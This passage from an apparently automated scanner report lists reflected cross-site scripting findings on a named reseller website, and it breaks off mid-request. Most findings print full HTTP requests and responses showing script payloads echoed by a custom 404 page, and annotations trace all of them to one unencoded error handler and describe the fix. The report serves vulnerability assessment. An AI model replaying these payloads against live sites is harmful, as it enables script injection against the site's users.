Path:   /web-service/software-scripts/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 20390<a>1710eb0079c was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

As with Submit3 in 2.5268, the probe caused a 404, and the reflection is the custom error document echoing the raw request URI into a <p> element, not anything search.php does with keyword. That page reflected a <script> payload verbatim in 2.5272, so the lower confidence here means only that the scanner's JavaScript probe in keyword was not echoed the same way; check by hand whether a <script> payload in keyword still triggers the error page before downgrading the finding.

Request

GET /web-service/software-scripts/search.php?keyword=search...20390<a>1710eb0079c&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/search.php?keyword=search...20390<a>1710eb0079c&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5272. http://www.resellerbase.com/web-service/software-scripts/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a3962<script>alert(1)</script>d3d4211c03b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The reflection occurs in the custom 404 error document, which writes the raw request URI into a <p> element without HTML encoding. Because every request to this host that ends in a 404 passes through that page, any parameter name, parameter value or path segment that survives into the URI is an injection vector, which is why the neighbouring findings on search.php (2.5268, 2.5271, 2.5273) and the REST URL parameter findings under /web-service/software-scripts/themes/ all show the same response.

Request

GET /web-service/software-scripts/search.php?keyword=search...&Submit3=Search&opt=2&a3962<script>alert(1)</script>d3d4211c03b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/search.php?keyword=search...&Submit3=Search&opt=2&a3962<script>alert(1)</script>d3d4211c03b=1 was not found on this server.</p>
...[SNIP]...

2.5273. http://www.resellerbase.com/web-service/software-scripts/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload df092<a>27d9303e837 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The response is again the custom 404 error document echoing the raw request URI, the same sink that reflected <script> verbatim in 2.5272; treat this as that one defect rather than a separate weakness in the handling of opt, and verify manually whether a <script> payload in opt reaches the error page.

Request

GET /web-service/software-scripts/search.php?keyword=search...&Submit3=Search&opt=2df092<a>27d9303e837 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/search.php?keyword=search...&Submit3=Search&opt=2df092<a>27d9303e837 was not found on this server.</p>
...[SNIP]...

2.5274. http://www.resellerbase.com/web-service/software-scripts/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1a13c<script>alert(1)</script>30404b82f9c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

This finding and the other REST URL parameter and arbitrary-parameter-name findings on the theme paths that follow (2.5275 onward) all reflect through one place: the custom 404 error document, which writes the raw request URI into a <p> element without HTML encoding. No application script on these paths handles the input; the defect is in the error handler, and a single fix, HTML-encoding the request URI before output (htmlspecialchars with ENT_QUOTES on $_SERVER['REQUEST_URI'] in PHP, assuming that is the value being echoed) or not echoing it at all, closes every one of them. Apache's built-in 404 page already escapes the URI, so the custom ErrorDocument is a regression from the default.

Request

GET /web-service1a13c<script>alert(1)</script>30404b82f9c/software-scripts/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service1a13c<script>alert(1)</script>30404b82f9c/software-scripts/themes/ was not found on this server.</p>
...[SNIP]...

2.5275. http://www.resellerbase.com/web-service/software-scripts/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6d196<script>alert(1)</script>fef26bf6a86 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts6d196<script>alert(1)</script>fef26bf6a86/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts6d196<script>alert(1)</script>fef26bf6a86/themes/ was not found on this server.</p>
...[SNIP]...

2.5276. http://www.resellerbase.com/web-service/software-scripts/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3e09d<script>alert(1)</script>782daad0b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes3e09d<script>alert(1)</script>782daad0b1/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes3e09d<script>alert(1)</script>782daad0b1/ was not found on this server.</p>
...[SNIP]...

2.5277. http://www.resellerbase.com/web-service/software-scripts/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d212a<script>alert(1)</script>4ebf22f88d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/?d212a<script>alert(1)</script>4ebf22f88d1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/?d212a<script>alert(1)</script>4ebf22f88d1=1 was not found on this server.</p>
...[SNIP]...

2.5278. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3ac80<script>alert(1)</script>50a731f0fdd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service3ac80<script>alert(1)</script>50a731f0fdd/software-scripts/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service3ac80<script>alert(1)</script>50a731f0fdd/software-scripts/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.5279. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ad13<script>alert(1)</script>6c13d010212 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts5ad13<script>alert(1)</script>6c13d010212/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts5ad13<script>alert(1)</script>6c13d010212/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.5280. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 290c3<script>alert(1)</script>3f642a68084 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes290c3<script>alert(1)</script>3f642a68084/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes290c3<script>alert(1)</script>3f642a68084/kosmos/ was not found on this server.</p>
...[SNIP]...

2.5281. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3823a<script>alert(1)</script>aa0af620e11 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos3823a<script>alert(1)</script>aa0af620e11/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos3823a<script>alert(1)</script>aa0af620e11/ was not found on this server.</p>
...[SNIP]...

2.5282. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5e4a7<script>alert(1)</script>6126acb8d26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/?5e4a7<script>alert(1)</script>6126acb8d26=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/?5e4a7<script>alert(1)</script>6126acb8d26=1 was not found on this server.</p>
...[SNIP]...

2.5283. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e23ec<script>alert(1)</script>ada8d1c2082 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicee23ec<script>alert(1)</script>ada8d1c2082/software-scripts/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicee23ec<script>alert(1)</script>ada8d1c2082/software-scripts/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.5284. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48d21<script>alert(1)</script>3c1e85b9675 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts48d21<script>alert(1)</script>3c1e85b9675/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts48d21<script>alert(1)</script>3c1e85b9675/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.5285. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6ff05<script>alert(1)</script>9cd2cf1f597 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes6ff05<script>alert(1)</script>9cd2cf1f597/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes6ff05<script>alert(1)</script>9cd2cf1f597/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.5286. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 22257<script>alert(1)</script>4529fa90553 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos22257<script>alert(1)</script>4529fa90553/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos22257<script>alert(1)</script>4529fa90553/images/ was not found on this server.</p>
...[SNIP]...

2.5287. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ae50b<script>alert(1)</script>a30f998c5ea was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/imagesae50b<script>alert(1)</script>a30f998c5ea/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/imagesae50b<script>alert(1)</script>a30f998c5ea/ was not found on this server.</p>
...[SNIP]...

2.5288. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cb761<script>alert(1)</script>ac73042935b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/?cb761<script>alert(1)</script>ac73042935b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/?cb761<script>alert(1)</script>ac73042935b=1 was not found on this server.</p>
...[SNIP]...

2.5289. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 60f10<script>alert(1)</script>30d91c9d703 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service60f10<script>alert(1)</script>30d91c9d703/software-scripts/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
